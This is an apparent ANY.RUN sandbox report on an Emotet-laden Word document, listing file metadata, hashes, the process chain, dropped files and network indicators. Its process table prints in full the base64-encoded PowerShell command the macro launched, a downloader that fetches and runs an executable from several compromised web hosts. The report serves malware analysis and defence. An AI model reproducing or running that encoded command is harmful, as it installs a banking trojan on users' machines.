analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Doc 543228 318165.doc

Full analysis: https://app.any.run/tasks/82bf4c8c-7e29-4d04-93c1-cf7ef020e32e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: May 15, 2019, 13:56:30
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Movies, Subject: Roads, Author: Lempi Greenholt, Comments: seamless, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue May 14 23:43:00 2019, Last Saved Time/Date: Tue May 14 23:43:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 169, Security: 0
MD5:

F0B8D0083EFDF5162118FFB7AC7A6944

SHA1:

384BB6E06691E48AA3CEA3D76EC4EC7DF7B24E8D

SHA256:

EDD7683434BF4B5DCF6E62052C0D260F9CE2824BCD2E7FC527680DC96CF84FA0

SSDEEP:

3072:m77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qE6Q0DyRv7nG5osJ:m77HUUUUUUUUUUUUUUUUUUUT52VWxDyC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 664.exe (PID: 3748)
      • soundser.exe (PID: 1140)
      • 664.exe (PID: 2844)
      • soundser.exe (PID: 2060)

    • Emotet process was detected

      • soundser.exe (PID: 1140)

  • SUSPICIOUS

    • Application launched itself

      • 664.exe (PID: 3748)
      • soundser.exe (PID: 1140)

    • Creates files in the user directory

      • powershell.exe (PID: 2712)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2712)
      • 664.exe (PID: 2844)

    • Starts itself from another location

      • 664.exe (PID: 2844)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2932)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2932)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Manager: Zemlak
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 197
Paragraphs: 1
Lines: 1
Company: Bednar and Sons
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 169
Words: 29
Pages: 1
ModifyDate: 2019:05:14 22:43:00
CreateDate: 2019:05:14 22:43:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: seamless
Keywords: -
Author: Lempi Greenholt
Subject: Roads
Title: Movies
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 664.exe no specs 664.exe #EMOTET soundser.exe no specs soundser.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2932"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Doc 543228 318165.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2712powershell -enc JABTADUAMAA1ADMANwA1ADMAPQAnAFkAXwA2ADgAMgBfADQAJwA7ACQAQwA0ADkANwAxAF8AIAA9ACAAJwA2ADYANAAnADsAJABuAF8ANQA4ADkAXwA9ACcAaAA3ADAANgAwADIANwAnADsAJABaADIAMQAzADEAXwA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABDADQAOQA3ADEAXwArACcALgBlAHgAZQAnADsAJABPADMANgA4ADEAOQA9ACcAWAA2ADUAMwAwADQANQAwACcAOwAkAGgANwAyAF8AMgAzADMAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AYABlAFQALgB3AEUAYABCAEMATABpAEUAYABOAFQAOwAkAFEAMgAzAF8ANwBfAD0AJwBoAHQAdABwADoALwAvAGEAbgBnAGUAbAB5AG8AcwBoAC4AYwBvAG0ALwBhAG4AZAByAGUAYQBwAHUAdAByAGkAYQBuAGEALgBvAG4AbABpAG4AZQAvAFEAUwBTAFYASABrAEIAWQAvAEAAaAB0AHQAcAA6AC8ALwA0AGkAbQAuAHUAcwAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGMATQBIAEcATgBXAFIATgAvAEAAaAB0AHQAcAA6AC8ALwBzAG8AbAB1AHQAaQBvAG4AcAB1AGIALgBkAHoALwB3AHAALQBhAGQAbQBpAG4ALwBNAGEAagBPAFEARwBwAEkALwBAAGgAdAB0AHAAOgAvAC8AYQBsAGEAbgBrAGkAcABwAGEAeAAuAGkAbgBmAG8ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ATQB2AEEAWABvAGcAcwB4AHIAUQAvAEAAaAB0AHQAcAA6AC8ALwBwAGEAcgB0AHQAaQBtAGUAcABhAHoAYQByAGwAYQBtAGEALgBjAG8AbQAvAHMAaQB0AGUAbQBhAHAAcwAyADEAMgAvAGgAcgBVAHAAZQBsAGoASAAvACcALgBTAFAAbABJAFQAKAAnAEAAJwApADsAJABTADEAMgA3ADQAMgA9ACcAaQA3AF8AMQA1ADEAMQAnADsAZgBvAHIAZQBhAGMAaAAoACQAegA2ADgAXwBfADUAIABpAG4AIAAkAFEAMgAzAF8ANwBfACkAewB0AHIAeQB7ACQAaAA3ADIAXwAyADMAMwAuAGQAbwBXAE4ATABvAEEARABmAGkATABFACgAJAB6ADYAOABfAF8ANQAsACAAJABaADIAMQAzADEAXwA1ACkAOwAkAFUANwA1ADkAMwBfAD0AJwBWADIANQAwADMANgA3ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAWgAyADEAMwAxAF8ANQApAC4ATABFAE4AZwBUAGgAIAAtAGcAZQAgADIANAA3ADEAMQApACAAewAmACgAJwBJAG4AJwArACcAdgBvAGsAZQAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaADIAMQAzADEAXwA1ADsAJABCADIAOABfADUAXwA9ACcAdQAxADUAMgA0ADIAJwA7AGIAcgBlAGEAawA7ACQAQQA0ADMANAAyADIAPQAnAHQAXwA1ADkANQAyACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAOQAxADYANAA1ADIANgA9ACcAQgA4AF8ANAA5ADMAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3748"C:\Users\admin\664.exe" C:\Users\admin\664.exepowershell.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Process Manager Remote Server
Exit code:
0
Version:
1.8.0.1800
2844--43274a32C:\Users\admin\664.exe
664.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Process Manager Remote Server
Exit code:
0
Version:
1.8.0.1800
1140"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
664.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Process Manager Remote Server
Exit code:
0
Version:
1.8.0.1800
2060--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exesoundser.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Process Manager Remote Server
Version:
1.8.0.1800
Total events
1 671
Read events
1 204
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVREA10.tmp.cvr
MD5:
SHA256:
2712powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4Q196U8BTWTZ5SQ1233W.temp
MD5:
SHA256:
2932WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:A0D7235B4D50FB7CB8D5649C365834BC
SHA256:6664D025F0137CE35BCB828739B37400C1214A15AAEA959AB886930CDEB5417F
2932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:F7822C53AD721458637797EAB9FF82DC
SHA256:F92DF4352F2DC252D78103B7A962ACB4EF1D0F06ECE5D51F8C0A877B880683B2
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DBF55D3F.wmfwmf
MD5:7EBB58F665D41A16CBC122BEA8397D70
SHA256:F658FF04F5AEF69F7C54F243F726BAAD1312D5ABC13E19D6AB7E5B118C9FE92A
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C3D634.wmfwmf
MD5:ABE208E65C6E510734A4B4D1B51E684D
SHA256:5A9BF787E21CB05B32B256F41BE19BFD43100947FA67D16A4CD82C89CF9D4DAC
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5ABC7E62.wmfwmf
MD5:158C99AF6EA016698D33894427DE775C
SHA256:068B9A016334B15C496E5DCA491D297FEB691CD03F30F913ED1614D9A85AED9C
2844664.exeC:\Users\admin\AppData\Local\soundser\soundser.exeexecutable
MD5:EC101DF5494AA9C94FA36EB8CB4C154B
SHA256:C89521BEAFB0512674AA2379C2B3D088D5E9FC1974993B3DE36B1A5ACDD9D7DF
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\959DB9AD.wmfwmf
MD5:E3441ADDB6CCFA2133AA6667D48E15C3
SHA256:574A5C9309A62733C08D4E406651197CEBAE649F40ABF0E1846B9135D8D5E4AF
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9CCB2543.wmfwmf
MD5:9B65CF0D4A58398412C8EC8D16152AA9
SHA256:8CE15822FFCF829484971BBBD8086F328535E55B3EC81398441956D8C82A7E39
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2712
powershell.exe
111.68.113.243:80
angelyosh.com
Varnion Technology Semesta, PT
ID
suspicious

DNS requests

Domain
IP
Reputation
angelyosh.com
  • 111.68.113.243
suspicious

Threats

PID
Process
Class
Message
2712
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2712
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2712
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Doc 543228 318165.doc